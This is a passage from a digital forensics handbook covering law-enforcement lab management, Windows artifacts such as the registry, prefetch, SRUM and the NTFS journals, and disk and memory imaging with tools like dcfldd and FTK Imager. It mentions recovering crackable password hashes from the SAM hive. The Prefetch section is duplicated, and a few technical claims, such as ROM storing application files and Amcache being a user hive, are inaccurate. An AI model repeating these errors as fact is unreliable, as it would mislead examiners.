Accreditation is not mandatory in the United States, but it is highly recommended. It may become mandatory in the future and is therefore worth mentioning and describing. The ANSI-ASQ National Accreditation Board (ANAB)¹⁸⁶ is a subsidiary of the American National Standards Institute (ANSI)¹⁸⁷ and the American Society for Quality (ASQ)¹⁸⁸. In order to have your lab considered for accreditation, ANAB will audit the lab's tasks and functions to ensure correct procedures are being followed consistently.

Budgeting for the lab

Digital Forensics is an expensive operation. You will need to budget appropriately for your lab to continue successfully and responsibly. Plan for hardware and software licensing costs alongside training, certification, and expansion costs. Create monthly, quarterly, and annual expenditure spreadsheets. Estimate your total annual number of examinations and the types of cases, as you may need to plan for the purchase of new software or hardware for use in special circumstances. Planning for future operations is critical, as technology evolves quickly and storage sizes on devices grow rapidly. Training is absolutely necessary to maintain knowledge of new operating systems and hardware.

¹⁸²https://aboutdfir.com/
¹⁸³https://dfirdiva.com/
¹⁸⁴http://dfir.training/
¹⁸⁵https://www.sans.org/
¹⁸⁶https://anab.ansi.org/
¹⁸⁷https://ansi.org/
¹⁸⁸https://asq.org/
Duties and responsibilities

ANAB requires that specific objectives be determined for each role within a digital forensics lab by the lab manager, who is responsible for establishing, enforcing, and reviewing procedures for case management. The manager also plans for updates and upgrades and accounts for all activities and training within the lab. Other lab members should have enough training to utilize their equipment effectively and should report directly to the lab manager.

Privacy Policy

Any law enforcement digital forensics lab should consider having a privacy policy regarding the handling of digital evidence. There are websites such as NATSAR.com¹⁸⁹ that offer model policies for a price, but you can also reach out to the community through the Digital Forensics Discord Server for free copies of other agencies' policies. Having a privacy policy will go a long way toward protecting your agency and lab members from litigation in high-profile cases.

Standard Operating Procedures

It should go without saying that having Standard Operating Procedures (SOPs) developed, maintained, and reviewed by the lab manager is a good idea. Not only is it required for accreditation, it will also protect the agency from litigation in much the same way as a privacy policy. By creating SOPs based on national standards from the Scientific Working Group on Digital Evidence (SWGDE)¹⁹⁰ or the National Institute of Standards and Technology (NIST)¹⁹¹, you can rest assured that your lab is operating within accreditation standards.

Chapter Summary

In summary, a law enforcement digital forensics lab operates to conduct criminal investigations and store evidence. The outcome of a murder investigation or the exoneration of an innocent suspect may be entirely determined by the work done by lab members. That responsibility should weigh heavily upon each person involved and be considered in day-to-day operations as well as future planning. The setup and maintenance of an effective lab can be an expensive operation, and the obligation to tax-paying citizens should be a constant presence in the mind of the lab manager. As law enforcement examiners, your duty is to protect and serve the community and your agency. Always remember that, and strive to make your lab better every day by improving your skills and knowledge, those of other lab members, and your equipment. Serve with pride in knowing that your mission is noble and impactful, and you will be joined by a global community of Digital Forensics Examiners who will welcome you into the fold.

¹⁸⁹https://natsar.com/
¹⁹⁰https://www.swgde.org/
¹⁹¹https://www.nist.gov/
Chapter 8 - Artifacts as Evidence

By Nisarg Suthar¹⁹²

Forensic Science

Before learning about artifacts as digital evidence, I'll preface this chapter with the most fundamental definition of basic science. So what is science? It is any field that follows the scientific process. That process is cyclical and goes something like this:

• We make observations in nature.
• We form an initial hypothesis about something.
• We look for things that confirm or deny the formed hypothesis.
• If we find something that denies it, we form a new hypothesis and go back to making observations.
• If we find something that confirms it, we continue making new observations to extend our dataset and verify the hypothesis, until the dataset is substantial enough to confirm it precisely and accurately. If we later find something that denies the original hypothesis, we form a new one by repeating the process.

¹⁹²https://linktr.ee/NisargSuthar
We never pollute this scientific process with biases or opinions. It is only credible as far as the fact finder's neutrality goes. All scientists trust observations and verified prior research, discarding all speculation.

16.1 - Attr: GliderMaven, CC BY-SA 4.0, via Wikimedia Commons

Ultimately, the goal of any science is not to state things in absolutes, but in observations, experiments, procedures, and conclusions. Even the fundamental laws of science are built on a basic foundation of assumptions.

Much like any scientific field, 'forensics' or 'criminalistics' is a branch of science that deals with identifying, collecting, and preserving evidence of a crime. It is not just identifying, collecting, and preserving, but doing so in a forensically sound manner, meaning that evidence should not be changed or allowed to stray from its true form.

Digital Forensics is a six-phase process:

• Preparation: Making sure your suite of forensic tools is up to date, and destination media are sanitized.
• Identification: Identifying the devices of interest at the site. Mobile phones, laptops, IoT devices, USB drives, cameras, SD cards, etc. Anything with some type of digital memory.
• Collection: Acquiring the memory via imaging and hashing the sources for verification.
• Preservation: Using techniques viable for long-term storage of sensitive evidence. Also includes maintaining a valid chain of custody.
• Analysis: Dissecting the acquired evidence. All puzzle solving and brainstorming happens in this phase.
• Reporting: Preparing a concise and easily digestible report of your findings for people who may not be technically inclined. The report must show forensic soundness for it to be admissible in a court of law.
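To make the verification step of the Collection phase concrete, here is a minimal PowerShell sketch; the image paths are hypothetical, and the same idea applies to whatever hashing tool your lab already trusts.

# Hash the acquired image and a working copy, then confirm they match
$original    = Get-FileHash -Algorithm SHA256 'E:\Acquisitions\Case042\laptop.E01'   # hypothetical path
$workingCopy = Get-FileHash -Algorithm SHA256 'F:\Analysis\Case042\laptop.E01'       # hypothetical path
$original.Hash -eq $workingCopy.Hash   # True means the copy is verified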
Types of Artifacts

Analysis is a major phase in which forensicators discover different types of artifacts, ranging from plain metadata to complex evidence of execution and residual traces. The vast gap in the difficulty of retrieving or reconstructing evidence marks the fine line between E-Discovery and Digital Forensics.

User data such as internet history, images, videos, emails, messages, etc., falls under E-Discovery. It is relatively easy to reconstruct, even from unallocated space. However, system data artifacts, which help support some view of the truth or determine how closely a transpired event matches the evidence, are not that simple to parse manually with forensic soundness. This is why forensicators oftentimes rely on well-known parsing tools, either commercial or open-source.

16.2 - Attr: Original from 6th slide in DVD included with E-Discovery: An Introduction to Digital Evidence by Amelia Phillips, Ronald Godfrey, Christopher Steuart & Christine Brown, modified here as text removal

And that is the main difference between E-Discovery & Digital Forensics, resting on the categorization of data alone. Both follow different procedures and have different scopes of execution. Generally, E-Discovery can be contained to only the logical partitions and the unallocated region, whereas Digital Forensics operates in a much wider scope, solely due to the necessity of dealing with complex data structures.
What is Parsing?

This brings us to parsing. We often go around throwing the term about while working with a variety of artifacts; "Parse this, parse that", but what does it mean in the real sense?

To understand the parsing methodology, tools & techniques, we must be familiar with how the data being parsed was originally meant to be handled. What was its structure by design? How can it be replicated? Generally, it is some feature or underlying mechanism of the main operating system installed on the device. Parsing tools are written to accurately mimic those functions of the operating system, making the raw data stored on the hardware human readable.

16.3 - Attr: Kapooht, CC BY-SA 3.0, via Wikimedia Commons

Think of the operating system as an abstraction layer between the end-user and the intricacies of raw data. It provides an interface to the user which hides all the complexities of computer data and how it is presented.

Before parsing artifacts and diving deep into analysis, you must fully understand how files are generally handled by an operating system. As mentioned earlier, an operating system is just a very sophisticated piece of software written by the manufacturers to provide an abstraction layer between the complexities of hardware interactions and the user.

In the context of file handling, operating systems either store files or execute files, and the two require different types of memory. Note that storing files requires access to storage media such as HDDs, SSDs, and flash drives, whereas executing files requires access to the microprocessor. Both are handled by the operating system.
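As a small illustration of what "parsing" means at the byte level, consider a Windows FILETIME timestamp: eight raw bytes that are meaningless on disk until they are interpreted the way the operating system intended. A minimal sketch follows; the byte value is generated in code purely for demonstration.

# Simulate 8 raw bytes as they might be carved from disk (a 64-bit FILETIME value)
$raw = [System.BitConverter]::GetBytes(([datetime]'2022-01-01Z').ToFileTimeUtc())
# The "parsing" step: interpret those bytes exactly the way Windows does
$ticks = [System.BitConverter]::ToInt64($raw, 0)   # little-endian 64-bit integer
[datetime]::FromFileTimeUtc($ticks)                # back to a human-readable UTC timestamp

Every parsing tool, from a registry viewer to a full forensic suite, is ultimately doing many layered versions of this same interpretation.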
As you might already know, computers, or any electronic computing devices for that matter, primarily utilize two types of memory:

1. RAM (Random Access Memory):
• Volatile memory; only works while power is supplied.
• Used for assisting the execution of applications/software by the processor of the device.

2. ROM (Read Only Memory):
• Non-volatile memory; retains data even when not in use.
• Used for storing application files for longer periods of time.

There are many sub-types of both RAM & ROM, but only the fundamental difference between them concerns us here. Now let's look at the lifecycle of an application in two stages:

1. Production Cycle: An application is a set of programs. A program is a set of code written by a programmer, generally in a higher-level language that does not interact directly with machine-level entities such as registers, buses, channels, etc. That piece of code is written to the disk. The code is then compiled to assembly, a lower-level language that can interact directly with machine-level entities. Finally, the assembly is converted to machine code consisting of 1s and 0s (also known as a binary or executable file), which is now ready for its execution cycle.

2. Execution Cycle: Now that the program is sitting on the disk, waiting to be executed, it is first loaded into RAM. The operating system instructs the processor about the arrival of this program and allocates resources when the processor makes them available. The processor's job is to execute the program one instruction at a time. The program can execute successfully unless the processor is required for another task with a higher priority, in which case the program is sent to the ready queue. The program can also terminate if it fails for some reason. Either way, it is eventually discarded from RAM.
You can easily remember both of these cycles by drawing an analogy between electronic memory and human memory. Here, I use chess as an example. Our brains, much like a computer, use two types of memory:

1. Short-term (working memory):
• In a game of chess, we calculate moves deeply, in a vertical manner, for a specific line based on the current position.
• This is calculative in nature. The calculation comes from the present situation.

2. Long-term (recalling memory):
• At the opening stage of a game of chess, we consider the candidate moves widely, in a horizontal manner, across many lines.
• This is instinctive in nature. Instinct comes from past experiences.

Understanding how an operating system parses data from different sources, whether on disk or in memory, will help you identify, locate, and efficiently retrieve the different types of artifacts necessary for an investigation.
Artifact-Evidence Relation

You will come across an ocean of different artifacts in your investigations, but artifacts have a very strange relationship with what might potentially be considered evidence. Artifacts alone do not give you the absolute truth of an event. They provide tiny peepholes through which you can reconstruct and observe a part of the truth. In fact, one can never be sure that what they have is indeed the truth in its entirety.

16.4 - Attr: Original by losmilzo on imgur, modified here as text removal
I always love to draw an analogy between artifacts and the pieces of a puzzle, of which you're not certain to have the edge or corner pieces. You gather what you can collect and try to paint a picture that is as unbiased and complete as possible.

16.5 - Attr: By Stefan Schweihofer on Pixabay

That being said, if you apply additional knowledge from metadata, OSINT, and HUMINT to the parsed artifacts, you might have something to work with. For instance, say you were assigned an employee policy violation case where an employee was using their work device for illegally torrenting movies. Parsing the artifacts alone will give you information about the crime, but not as evidence. You would still need to prove that the face behind the keyboard at the time of the crime was indeed the one your artifacts point to. So you would then look for CCTV footage around the premises, going back to the Identification phase of the Digital Forensics lifecycle, and so on.

Because artifacts depend on correlation with some external factor to carry weight, they form a direct non-equivalence relation with evidence. However, note that this "rule", if you will, applies only to the broader scope of the investigation. In the narrower scope of the forensicator's work, and for the scope of your final forensic report, artifacts are most critical. Just keep in the back of your mind that encountering an artifact alone doesn't mean it's admissible evidence. Parse the artifact, make notes, and document everything. Being forensically sound is more important than worrying about completing the entire puzzle, because there will be no edge or corner pieces to it.
Examples

This section will cover how some of the less common artifacts can play into a case from a bird's-eye view. We won't get into the technical specifics of parsing or extraction, but rather the significance of those artifacts at a much higher level, including what each offers, proves, and denies, and what its forensic value is. I suggest readers use these brief bits to spark their curiosity about these important artifacts, and research locating and parsing them on their own.

Registry

About:

• The Windows Registry is a hierarchical database used by the Windows operating system to store its settings and configurations. It also stores some user data pertaining to user applications, activities, and other residual traces.
• The Registry is structured with what are called hives or hive keys (HK) at the top-most level. Each hive contains numerous keys. A key can contain multiple sub-keys, and sub-keys contain fields with their values.

There are mainly two types of hive files:

1. System Hive Files:
• SAM (Security Account Manager): User account information such as hashed passwords and account metadata, including last login timestamp, login counts, account creation timestamp, group information, etc.
• SYSTEM: File execution times (evidence of execution), USB devices connected (evidence of removable media), local timezone, last shutdown time, etc.
• SOFTWARE: Information about both user and system software. Operating system information such as version, build, name & install timestamp. Last logged-on user, network connections, IP addresses, IO devices, etc.
• SECURITY: Information about security measures and policies in place for the system.

2. User Specific Hive Files:
• Amcache.hve: Information about application executables (evidence of execution), full path, size, last write timestamp, last modification timestamp, and SHA-1 hashes.
• ntuser.dat: Information about autostart applications, terms searched in Windows Explorer or Internet Explorer, recently accessed files, run queries, last execution times of applications, etc.
• UsrClass.dat: Information about user-specific shellbags, covered in the next section.
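For a quick taste of the kind of data these hives hold, the following is a minimal sketch that queries the SYSTEM hive on a live machine (run elevated) for USB mass storage devices, the "evidence of removable media" mentioned above. This is live-system triage with built-in cmdlets, not a substitute for offline hive parsing with a forensic tool.

# Enumerate USB mass storage devices recorded under the SYSTEM hive on a live system
Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Enum\USBSTOR\*\*' |
    Select-Object FriendlyName, PSChildName   # device name and instance ID (often the serial number)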
Significance:

• Identifying malware persistence, which can lead to the discovery of Indicators of Compromise (IOCs).
• Proving the presence of removable media in a particular time frame, which can further help with the acquisition of that media.
• Retrieving crackable user password hashes from the SAM and SYSTEM hives, which might help access encrypted partitions if the password was reused.

Shellbags

About:

• Shellbags were introduced in Windows 7. They are a convenience feature that allows the operating system to remember Windows Explorer configuration for user folders and a folder's tree structure.
• Whenever a folder is created, selected, right-clicked, deleted, copied, renamed, or opened, shellbag information will be generated.
• Depending on the Windows version, shellbag information can be stored in either ntuser.dat, UsrClass.dat, or both.

Significance:

• Reconstructing the tree structure of deleted folders. Helpful in providing an idea of the files that used to exist when they cannot be carved from unallocated space.
• Disproving denial of content awareness. If a subject claims they were simply not aware of something existing on their system, shellbags can disprove that claim, with the obvious caveat that exclusive usage of the machine must first be proven.
• Getting partial information about the contents of removable media that were once mounted on the system.

Prefetch

About:

• Prefetch was first introduced in Windows XP. It is a memory management feature that optimizes loading speeds for files that are frequently executed. Originally it was meant for faster boot times, but it has since been extended to applications too. Hence, this artifact is direct evidence of execution.
• We looked at the lifecycle of an application earlier; the prefetcher in Windows works the same way. It studies the first ~10 seconds of an application launch and creates/updates the corresponding prefetch file, for faster loading on the next execution.
Prefetch

About:

• Prefetch was first introduced in Windows XP. It is a memory management feature that optimizes loading speeds for frequently executed files. Originally it was meant for faster boot times, but it has since been extended to applications too. Hence, this artifact is direct evidence of execution.
• We looked at the lifecycle of an application earlier; the prefetcher in Windows works the same way. It studies roughly the first 10 seconds of an application's launch and creates or updates the corresponding prefetch file for faster loading on the next execution.
• Starting with Windows 10, prefetch files are compressed by default to save considerable disk space, using the Xpress algorithm with Huffman encoding. Before these files can be parsed or manually validated, forensicators must decompress them first. Thank you, Eric¹⁹³, for this handy Python script¹⁹⁴ that does exactly that.

16.6 - Working of Windows Prefetcher

The prefetcher has four possible settings:

Value Description
0 Disabled
1 Application prefetching enabled
2 Boot prefetching enabled
3 Application & boot prefetching enabled

This value is set in the registry key HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters. Forensicators can refer to this key to check whether prefetching is disabled.

¹⁹³https://twitter.com/ericrzimmerman
¹⁹⁴https://gist.github.com/EricZimmerman/95be73f6cd04882e57e6
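As a quick sketch, the prefetcher state can be checked from that value, and the prefetch files themselves can be parsed with Eric Zimmerman's PECmd, which handles the Windows 10 compression natively (output folder hypothetical):

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters" /v EnablePrefetcher
PECmd.exe -d C:\Windows\Prefetch --csv C:\triage\out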
Significance:

• Since it is evidence of execution, prefetch helps identify anti-forensic attempts at bypassing detection. Any automated anti-forensic tool that was run would in turn generate its own prefetch file.
• Useful in identifying and hunting executed ransomware. Once identified, analysts can look for publicly available decryptors to retrieve encrypted files.
• By studying the files and directories referenced by an executable, analysts can identify malware families.
• Application execution from removable media or deleted partitions can be identified from the parsed volume information.
• Timestamps for the last eight executions and the run counter are useful for frequency analysis of malicious executables. Worms, which result in multiple prefetch files referencing the exact same resources, are a prime example.

Jumplists & LNK files

About:

• LNK files, or link files, are the shortcuts that a user or an application creates for quick access to a file. LNK files are rich in metadata such as timestamps, file path, MAC address, volume information, and volume serial numbers.
• Apart from the Recent Items and Start Menu folders, LNK files are also found embedded in jumplists.
• Jumplists were first introduced in Windows 7. They are a convenience feature of the Windows Taskbar that gives a user quick access to files recently used in or by different applications. Windows automatically creates these 'lists' in the right-click context menu, which can be used to 'jump' to a frequently used file or action.
• There are two types of jumplists: automatic and custom. Automatic jumplists are created by Windows based on most recently used (MRU) and most frequently used (MFU) items. Custom jumplists are created by explicit user actions, such as bookmarking in a browser or pinning a file.
• Both categories of jumplists provide rich information like modified, accessed, and created timestamps, and the absolute file path of the original file.

Significance:

• Useful for gaining information on uninstalled applications and files deleted from the system, as well as applications run and files opened from removable media.
• Being direct evidence of execution and file access, jumplists are useful in timelining executed applications and opened files.
• Useful for discovering partial user history, including URLs and bookmarks.
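As a hedged example, both automatic and custom jumplists under a user's Recent folder can be parsed with Eric Zimmerman's JLECmd (the <user> placeholder and output folder are hypothetical):

JLECmd.exe -d C:\Users\<user>\AppData\Roaming\Microsoft\Windows\Recent --csv C:\triage\out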
SRUDB.dat

About:

• SRUDB.dat is an artifact created by SRUM (System Resource Usage Monitor), a feature introduced in Windows 8. SRUM tracks and monitors usage statistics for OS resources such as network data sent and received, process ownership, and power management information, as well as push notification data and, according to recent research¹⁹⁵, even which applications were in focus at a given time, along with keyboard and mouse events.
• It is capable of holding 30 to 60 days' worth of tracking data at a time.
• So far, we haven't looked at an artifact that can undoubtedly map a particular executed process to a user. SRUDB.dat offers this critical information directly. It is one of the most valuable artifacts due to the multidimensional applications of SRUM by the OS itself.

Significance:

• Useful for mapping a process to a user account, especially in scenarios with a restricted scope of acquisition.
• Useful for mapping a process to network activity such as bytes sent and received. Helpful in identifying data exfiltration incidents.
• Useful for timelining and distinguishing the network interfaces a machine connected to, and hence potentially estimating the whereabouts of the machine if those networks were far apart from one another.
• Useful for analyzing power management information such as battery charge and discharge levels.
• Useful for establishing awareness, or lack thereof, of an application that would have been visible on screen at some point in time, and of interaction with it by means of input devices.

¹⁹⁵https://aboutdfir.com/app-timeline-provider-srum-database/
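As a hedged sketch, the underlying ESE database can be parsed with Eric Zimmerman's SrumECmd; supplying the SOFTWARE hive lets the tool resolve network interface details (paths hypothetical; check the tool's help for current switches):

SrumECmd.exe -f C:\triage\SRUDB.dat -r C:\triage\SOFTWARE --csv C:\triage\out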
hiberfil.sys

About:

• hiberfil.sys was first introduced in Windows 2000. It is the file Windows uses to store the contents of memory to disk during hibernation and hybrid sleep cycles, which also protects the session against power failures.
• Writing the current contents of memory to disk, for later retrieval, lets the system continue from the same state. This avoids additional processing by applications, optimizes resource allocation by the operating system, and allows Windows to offer faster startup times from sleep states.
• Modern versions use the Xpress algorithm for compression. Volatility's imagecopy plugin can be used to convert this artifact into a raw memory image.

Significance:

• This is one of those artifacts that hops across categorical boundaries: memory content recovered during disk forensics can add a whole extra dimension to your investigation.
• When an investigation has to accept the unfortunate shutdown of a locked device, one can retrieve this file during disk forensics and gain additional information by performing memory forensics on the converted file. This way, partial volatile memory data is retained.
• May contain NTFS records, browsing history, index records, registry data, and other useful information.

pagefile.sys

About:

• Similar to hiberfil.sys, pagefile.sys is a swap file used by Windows to temporarily hold memory contents that could not be kept in RAM due to insufficient space. When enough memory is freed, contents are transferred from this file back into memory.
• The only generally available methods to extract information from this artifact are the strings utility, a hex editor, and filtering with regular expressions.
• Data is paged in and out in 4 KB chunks.

Significance:

• Useful for hunting IOCs in malware cases.
• Useful for carving smaller files that were meant to be loaded into memory, meaning it is evidence of access. If an image is successfully carved from this artifact, it was opened at some point, since it would eventually have been loaded into the working memory of the device.
• May contain NTFS records, browsing history, index records, registry data, and other useful information.
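Before moving on to the NTFS artifacts, here is a minimal, hedged sketch of both workflows just described: converting a hibernation file to a raw image with Volatility 2's imagecopy plugin (the profile is an assumption and must match the source system; Windows 8+ hibernation files may require additional tooling), followed by a quick strings-and-regex pass over a pagefile:

python2 vol.py -f hiberfil.sys --profile=Win7SP1x64 imagecopy -O hiberfil.raw
strings pagefile.sys | grep -E "https?://" | sort | uniq -c | sort -rn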
$MFT

About:

The next few artifacts, including this one, are part of the NTFS file system, one of the most common file systems encountered when working with Windows.

• MFT stands for Master File Table. It is a record of every file that exists, or once existed, on that particular file system.
• It also contains other information such as the path to each file, file size, file extension, MACB timestamps, system flags, whether the file was copied, etc.
• If a file is small enough to be accommodated by its MFT entry, we can even retrieve the resident data from the record itself. An MFT entry is typically 1,024 bytes long, and small files can fit entirely within it; the unused remainder of an entry is known as MFT slack space.

Significance:

• Files that were deleted may still have an intact MFT record entry if it has not been overwritten.
• Useful for retrieving smaller (resident) files from the record itself and for reconstructing file history on disk.
• Important metadata like MACB timestamps can be obtained.

$I30

About:

• $I30 is the index attribute of the NTFS file system. NTFS maintains $I30 index data for each directory, and the underlying B-tree constantly rebalances itself as files are created or deleted.
• $I30 is not a standalone file or artifact but a collection of multiple file system attributes, such as $INDEX_ROOT and $INDEX_ALLOCATION, with $Bitmap tracking allocation. The "30" in its name comes from the offset of the $FILE_NAME attribute in an MFT record.
• It keeps track of which files are in which directories, along with MACB timestamps and file locations.
• It also has slack space, similar to $MFT, which can again preserve entries for small or deleted files.

Significance:

• Original timestamps for deleted files can be retrieved.
• Useful for detecting anti-forensic tools and timestomping, as the timestamps are $FILE_NAME attribute timestamps, which are not easily modifiable or accessible through the Windows API.
• Important metadata like MACB timestamps can be obtained.
$UsnJrnl

About:

• The NTFS file system has a journaling mechanism that logs the transactions performed in the file system as a contingency plan for system failures and crashes. This transaction data is contained in the $UsnJrnl attribute file.
• $UsnJrnl, read as "USN Journal", contains two alternate data streams, $Max and $J, of which $J is of high interest to forensicators. It records whether a file was overwritten, truncated, extended, created, closed, or deleted, along with the corresponding timestamp for each update action.
• $UsnJrnl tracks high-level changes to the file system: file creation, deletion, renaming, and so on.

Significance:

• Useful to support or refute timestamp metadata. Potential evidence of deleted and renamed files, i.e., evidence of existence.
• The slack space for this artifact isn't managed at all, so additional data can be carved. Since the journal only keeps data for a limited number of days, carving can be especially useful for recovering deleted records.
• Tracks changes to files and directories along with the reason for each change.

$LogFile

About:

• This is yet another artifact used by NTFS for journaling. The difference is that $LogFile is concerned with changes made to the $MFT rather than the file system as a whole, meaning it may directly contain the data that was changed, similar to how $MFT sometimes stores resident files if they are small enough.
• $LogFile tracks low-level changes to the file system, i.e., the actual data that was changed.
• Taken together, these four NTFS artifacts ($MFT, $I30, $UsnJrnl, and $LogFile) can say a lot about an event or transaction when performing file system forensics.

Significance:

• Detecting anti-forensic attempts targeting the $MFT, since $LogFile contains the changes made to it.
• Tracks changes made to $MFT metadata such as MACB timestamps.
• Can help reconstruct a chronological list of transactions performed on the files within the file system.
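As a hedged example of pulling these artifacts apart, Eric Zimmerman's MFTECmd parses an exported $MFT and, in recent versions, the $J stream of $UsnJrnl, with the -m switch supplying the $MFT so that parent paths can be resolved (paths hypothetical; check the tool's help for current switches):

MFTECmd.exe -f C:\triage\$MFT --csv C:\triage\out
MFTECmd.exe -f C:\triage\$J -m C:\triage\$MFT --csv C:\triage\out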
Chapter 9 - Forensic imaging in a nutshell

By Guus Beckers²⁰⁷ | LinkedIn²⁰⁸

What is a disk image?

A disk image is a representation of the data contained on a disk. It holds the contents of the entire disk, including all files and folders. Dedicated forensic hardware appliances or software packages ensure a bit-by-bit copy is performed; in other words, the contents of the disk image will match the contents of the disk exactly. When an unexpected error occurs, it is flagged and the forensicator is notified. It is possible to make a disk image of every kind of data source: desktop computers, laptops and servers, a USB drive, an SD card, or any other storage medium you can think of.

While a complete discussion of file systems is outside the scope of this chapter, it is impossible to touch upon forensic imaging without talking about them. A file system is the logical representation of files and folders on the disk. It allows an operating system to keep track of files as well as other important file properties such as location, size, file format, and any associated permissions. Different file systems are used across operating systems. The NTFS file system is currently used by all supported versions of Microsoft Windows. APFS is used by devices created by Apple, across a wide range of hardware including phones, tablets, TV appliances, and computers. Lastly, there is the Linux operating system, which uses a variety of file systems depending on the installed version; common varieties include ext3/ext4 and btrfs, and more specialized file systems for specific appliances are also in use. The exact intricacies and technical documentation of a file system are often not available outside its vendor, which means software vendors have to reverse engineer a file system to a degree. Expect a forensic investigation suite to continually improve support for popular file systems.

²⁰⁷http://discordapp.com/users/323054846431199232
²⁰⁸https://www.linkedin.com/in/guusbeckers/
Once a disk image has been created, it is possible to calculate its checksum. A checksum can be used to verify the integrity of a disk image, which is of paramount importance during a forensic investigation, since evidence will always need to be retrieved from other systems. Calculating a checksum at both ends, for the source and destination file(s), ensures that no anomalies are present. When the checksums match at both ends, the contents of the files match exactly and the image can be used in a forensic investigation.

A checksum is produced by hashing: a mathematical, one-way calculation performed by a specific algorithm. The MD5 and SHA1 algorithms are commonly used in the forensic community, although other algorithms can be used as well. After validation of the checksum, the created image is ready to use in an investigation. Forensic investigation suites use the disk image as the basis for the investigation, allowing a forensicator to browse the file system for pertinent files and other forensic artifacts. Post-processing will also occur in many forensic suites, automatically parsing popular artifacts and thereby making investigations easier.
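As a brief, hedged illustration (file names hypothetical), comparing checksums of the source file and its copy is a single command on most Linux systems:

sha256sum evidence.raw
sha256sum /mnt/storage/evidence.raw

If the two digests are identical, the copy is an exact match; any difference means the image cannot be relied upon and should be re-acquired.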
Creating a disk image

There are different ways to create a disk image; this section discusses the most popular methods. Be aware that different scenarios might require different imaging methods. The following subsections are not ranked in order of preference.

Using a forensic duplicator

Forensic duplicators come in many shapes and sizes, but the most common variety is a portable hardware appliance that can be easily transported and used both in a lab environment and on-site at a client. A forensic duplicator can be used to create disk images of various physical media types. To do this, it distinguishes between source and destination drives. Source drives are generally connected to the left side of the device while destination drives are connected to the right side; be sure to confirm this with individual duplicators, as there might be deviations. Forensic duplicators support a range of connectivity methods such as SATA, IDE, and USB. The ports supported by a duplicator are mirrored on either side of the device. Ensure that the correct drives are connected to the correct side of the device prior to imaging; failure to do so might result in data erasure. Specialized duplicators also support SAS or an Ethernet connection to image across a computer network.

Duplicators are used to perform the following functions:

• Clone a disk to a different disk
• Clone a disk to an image
• Format or wipe a disk
• Calculate hashes and verify image integrity
• Detect an HPA (Host Protected Area) or DCO (Device Configuration Overlay)
• Blank disk detection, verifying whether a disk is entirely blank or contains data
Using a Live USB

In scenarios where it is not feasible to get access to physical media, a Live USB might provide an alternative. A Live USB contains an operating system which can be booted during the boot phase of a computer. For a Live USB to function, it is necessary to interrupt the boot cycle of the computer and select the boot-from-USB option; manufacturers have different hotkeys to access this functionality. Note that it is also possible to boot from a CD/DVD in a similar manner; in that case, select the CD/DVD option. While it may still be necessary to take a server or service offline, it is not required to open the machine up and remove a hard drive. Similarly, continuous miniaturization means that some SSDs can no longer be removed from the motherboard. Luckily, there are a number of free Live USB tools that can be used to circumvent these limitations and acquire forensic images.

One of the best-known tools is CAINE (Computer Aided Investigative Environment)²⁰⁹. CAINE is a Linux live environment that mounts any discovered drives as read-only by default to ensure the forensic integrity of the disks. It provides GUI-based tools for the following operations:

• Imaging a disk (Guymager)
• Mounting disk images (Xmount)
• Data recovery (DDrescue)
• Enabling write operations
• Mounting remote file systems across a network

In addition to its disk imaging tools, it provides a forensic environment which can be used to perform most forensic operations, including accessing various file systems, recovering data, and performing memory analysis. Another example of a forensic Live USB environment is Sumuri Paladin Edge²¹⁰, which is available free of charge. In addition to imaging the entire disk, it also allows you to convert images, find specific files, extract unallocated space, and interface with network shares. It is recommended to have a Live USB option within your lab at all times and to equip your forensicators with USB drives in case of onsite client emergencies.

²⁰⁹www.caine-live.net
²¹⁰https://sumuri.com/paladin/
Disk imaging on Windows and Linux

Situations occur in which a particular system cannot be turned off. Depending on the operating system, there are various ways to perform a forensic acquisition on a live machine.

Windows

FTK Imager²¹¹ is a well-known tool for performing disk acquisitions on a Windows host. It is part of the FTK forensic suite developed by Exterro (formerly AccessData); however, the imager is also available free of charge. FTK Imager can either be installed on the host operating system or be used in a "lite" mode. Lite mode is preferable, as no changes are made to the disk; be aware, however, that it does affect the contents of RAM. FTK Imager can be used to perform the following operations:

• Disk acquisitions (both physical and logical)
• Memory acquisitions
• Acquisitions of the Windows Registry
• Browsing the file system and selecting relevant files/folders

The following steps can be used to create a "lite" version which runs without a local installation. These steps are based on the official guide provided by Exterro to the forensic community:

1. Install FTK Imager on another workstation
2. Insert a USB drive
3. Copy the installation folder to the USB drive
4. Perform a hashing operation to ensure file integrity is in order

²¹¹https://www.exterro.com/forensic-toolkit
Linux

Linux has historically included an integrated utility capable of copying files called dd. dd can also be used for disk imaging; however, it was not built with forensics in mind. A duo of utilities, dcfldd and dc3dd, is available specifically for forensic disk imaging. Both tools can be used to image disks, and their main advantage over dd is integrated hashing support for various hashing algorithms. All three utilities use the Linux block devices available under /dev/ to perform a physical disk image capture.

An example of dcfldd is included below. Be warned that these tools can and will destroy evidence if used incorrectly. In this particular instance, a 976 MB USB stick was inserted and its partition, the block device sdb1, is imaged. An MD5 hash is generated, and the hash log is written to the home folder along with the image.

dcfldd if=/dev/sdb1 conv=sync,noerror hash=md5 hashwindow=976M hashlog=/home/example/hash.txt hashconv=after of=/home/example/image.dd

Virtual machines

Virtual machines have become commonplace in the IT industry, in short allowing an organization to scale resources without purchasing additional hardware. The use of virtual machines is also advantageous for imaging purposes: a client can simply send the virtual hard drive files for forensic investigation. After performing the customary hashing procedures, these files can be converted if necessary. FTK Imager supports conversion of VMDK files to any other FTK image format, which in turn can be used by a forensic program or suite. qemu-img²¹² can be used to convert various hard drive image formats to raw dd format. An example covering the conversion of a VMDK file is included below.

qemu-img convert -f vmdk -O raw image.vmdk image.img

²¹²https://qemu.readthedocs.io/en/latest/index.html
Memory forensics

Background

While disk forensics focuses on forensic artifacts from files and folders, more pertinent information can also be readily available within a computer's memory. A computer's memory, called Random Access Memory (RAM) for short, is used to carry out all active tasks of a computer. As such, it contains a wealth of artifacts not available through other means, for instance:

• A list of active and (potentially) recently terminated processes
• Active network connections
• Entered system commands
• Open file handles

To collect this information, an application performs a memory dump. A memory dump is exactly what it sounds like: the contents of RAM extracted to disk. Be aware that as the size of the RAM increases, an equivalent amount of disk space should be readily available for storage. Furthermore, the RAM does not remain in stasis while the extraction takes place; it continues to perform tasks and will keep changing for the duration of the dump.

Windows

A memory dump on Windows can be performed with multiple tools. FTK Imager was already mentioned in the previous section. An alternative to FTK Imager in this regard is the utility DumpIt²¹³, which can be used without installation on the host system. The directory it is launched from also doubles as the destination directory; take this into consideration before performing a memory dump.

Linux

